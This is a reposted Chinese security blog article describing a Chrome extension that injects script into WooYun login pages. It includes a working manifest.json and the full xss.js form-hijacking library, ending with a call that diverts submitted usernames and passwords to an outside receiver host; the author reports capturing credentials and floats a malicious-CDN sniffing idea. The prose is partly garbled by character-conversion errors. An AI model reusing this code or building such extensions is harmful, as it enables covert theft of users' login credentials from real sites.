利用Chrome插件向指定页面植入js,劫持 XSS

时间  2019-11-18
标签 利用 chrome 插件 指定 页面 植入 劫持 xss 栏目 Chrome 繁體版
原文   原文链接
资源来自:http://www.2cto.com/Article/201307/225986.html
首页 >  安全 >  网站安全 > 正文
利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践
2013-07-08       0  个评论      
收藏    我要投稿
 
 
0x00 Chrome 插件
--------------------------
这个想法是昨天看到@紫梦芊 的帖子想起来的。
想法以下:
Chrome插件是能够经过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在全部乌云的页面里<script src=//xsser.me></script>呢?
因而,开始实践。(为了方便,只是弹了一个小框框)。
Manifest.json内容:
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
   "name" : "XiaoChaJian" ,
   "version" : "1.0" ,
   "manifest_version" : 2,
   "author" : "VIP" ,
   "icons" : {
       "128" : "icon.png"
    },
   "permissions" : [
     "tabs" , "http://*/*" , "https://*/*"
   ],
   "content_scripts" : [
     { "js" :[ "contentscript.js" ], "matches" : [ "http://wooyun.org/*" , "http://*.wooyun.org/*" ]}
    ]
}

 

contentscript.js内容:
alert(/xss/); 




那么,将弹框换成xsser.me,是否是就能截获想要的cookies了呢?
很遗憾,这种方法在乌云无效,由于乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟同样),可是很麻烦,因而,又有一个猥琐的想法诞生了:在乌云的登陆页面中,插入@Sogili的xss.js来劫持表单,是否是就能把用户名和密码发送到咱们想要的地方去了呢?
开始实践:
Manifest.json内容:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
{
   "name" : "JieChiBiaoDan" ,
   "version" : "1.0" ,
   "manifest_version" : 2,
  
  
"author" : "VIP" ,
   "icons" : {
       "128" : "icon.png"
  
  
},
   "permissions" : [
     "tabs" , "http://*/*" , "https://*/*"
   ],
  
  
"content_scripts" : [
     { "js" :[ "contentscript.js" ], "matches" :
  
[ "http://wooyun.org/user.php?
  
action=login*" , "http://www.wooyun.org/user.php?action=login*" ]}
  
  
]
}
contentscript.js内容:
;; var xss = function (){
   var x = {
     'name' : 'xss.js' ,
     'version' : '0.2.1' ,
     'author' : '长短短(sogili)'
   };
  
   x.x= function (id){ return document.getElementById(id)};
  
   //容错取值
   x.e= function (_){ try { return eval( '(' +_+ ')' )} catch (e){ return '' }};
  
   //浏览器
   x.i={
     i:!!self.ActiveXObject&&( function (){
       for ( var v=6,s=document.createElement( 's' );
         s.innerHTML= '<![if gt IE ' +(v++)+ ']
  
><i></i><![endif]-->' ,
         s.getElementsByTagName( 'i' )[0];);
       return v;
     }()),
     c:!!self.chrome,
     f:self.mozPaintCount>-1,
     o:!!self.opera,
     s:!self.chrome&&!!self.WebKitPoint
   };
  
   //UA
   x.ua = navigator.userAgent;
  
   //判断是否为苹果手持设备
   x.apple=/ip(one|ad|od)/i.test(x.ua);
  
   //随机数
   x.rdm= function (){ return ~~(Math.random()*1e5)};
  
   //url编码(UTF8)
   x.ec=encodeURIComponent;
  
   x.html= function (){
     return document.getElementsByTagName( 'html' )[0]
         ||document.write( '<html>' )
         ||document.getElementsByTagName
  
( 'html' )[0];
   };
  
   /*
    * 销毁一个元素
    */
   x.kill= function (e){
     e.parentElement.removeChild(e);
   };
  
   /*
    *绑定事件
    */
   x.bind= function (e,name,fn){
     e.addEventListener?e.addEventListener
  
(name,fn, false ):e.attachEvent( "on" +name,fn);
   };
  
   /*
    * dom准备完毕时执行函数
    */
   x.ready= function (fn){
     if (!x.i.i){
       x.bind(document, 'DOMContentLoaded' ,fn);
     } else {
       var s = setInterval( function (){
         try {
           document.body.doScroll( 'left' );
           clearInterval(s);
           fn();
         } catch (e){}
       },4);
     }
   }
  
   /*
    * 同源检测
    */
   x.o= function (url){
     var link = x.dom( '<a href="' +encodeURI(url)+ '">' ,1);
     return link.protocol+link.hoatname+ ':' +(link.port||80)
  
==location.protocol+location.hoatname+ ':' +(location.port||80);
   };
  
   /*
    * html to dom
    */
   x.dom= function (html,gcsec){
     var tmp = document.createElement( 'span' );
     tmp.innerHTML=html;
     var e = tmp.children[0];
     e.style.display= 'none' ;
     x.html().appendChild(e);
     gcsec>>0>0&&setTimeout( function (){
       x.kill(e);
     },gcsec*1000);
     return e;
   };
  
   /*
    * ajax
    */
   x.ajax= function (url,params,callback){
     (params instanceof Function)&&
  
(callback=params,params=void(0));
     var XHR = (!x.o(url)&&window.XDomainRequest)||
           window.XMLHttpRequest||
           ( function (){ return new ActiveXObject
  
( 'MSXML2.XMLHTTP' )});
     var xhr = new XHR();
     xhr.open(params? 'post' : 'get' ,url);
     xhr.withCredentials = true ;
     try {params&&xhr.setRequestHeader( 'content-
  
type' , 'application/x-www-form-urlencoded' );} catch (e){}
     callback&&(xhr.onreadystatechange = function () {
       ( this .readyState == 4 && (( this .status >= 200
  
&& this .status <= 300) || this .status == 304))&&callback.apply
  
( this ,arguments);
     });
     xhr.send(params);
   };
  
   /*
    * CSRF
    */
   x.csrf= function (url,params,callback){
     (params instanceof Function)&&
  
(callback=params,params=void(0));
     if (params){
       var form = x.dom( '<form method=post>' );
       form.action=url;
       for ( var name in params){
         var input = document.createElement
  
( 'input' );
         input.name=name;
         input.value=params[name];
         form.appendChild(input);
       }
       var iframe = x.dom( '<iframe sandbox
  
name=_' +x.rdm()+ '_>' ,6);
       callback&&setTimeout( function (){
         x.bind(iframe, 'load' ,callback);
       },30);
       form.target=iframe.name;
       form.submit();
     } else {
       var img = new Image();
       callback&&(img.onerror=callback);
       img.src=url;
     }
   };
  
   /*
    * 表单劫持
    */
   x.xform= function (form,action){
  
  
form.old_action=form.action,form.old_target=form.target,form.action=act
  
ion;
     var iframe = x.dom( '<iframe name=_' +x.rdm()+ '_>' );
     form.target=iframe.name;
     setTimeout( function (){
       x.bind(iframe, 'load' , function (){
  
  
form.action=form.old_action,form.target=form.old_target,form.onsubmit=n
  
ull,form.submit();
       });
     },30);
   };
  
   /*
    * 函数代理
    */
   x.proxy= function (fn,before,after){
     return function (){
       before&&before.apply( this ,arguments);
       var result = fn.apply( this ,arguments);
       after&&after.apply( this ,arguments);
       return result;
     }
   };
  
   return x;
}();
xss.xform(document.forms[1], 'http://vip.yupage.com/wy.php' );//劫持表单

  http://vip.yupage.com/wy.php是我作好的一个接收页面,代码以下:







开始测试,打开登陆页,填好用户名密码验证码,点击登陆,首先会像个人接收页发起POST,而后才会POST乌云。



再去看看,用户名密码已经躺在那里了。

在不知情的状况下,用户名和密码就这样被劫持走了。乌云的wb转帐功能但是没有二次验证的哦。
0x01 CDN --------------- 如今有许许多多的网站使用了CDN来进行加速/防D等。 去搜索了下CDN的工做原理,大概是这样的。 用户访问-》自动分配最快的节点-》请求原服务器------- 返回给用户《-返回给节点服务器《-原服务器返回数据<-| 那么,能不能搭建一台恶意的CDN,而后嗅探全部使用了该CDN的网站的用户名密码呢?  
相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程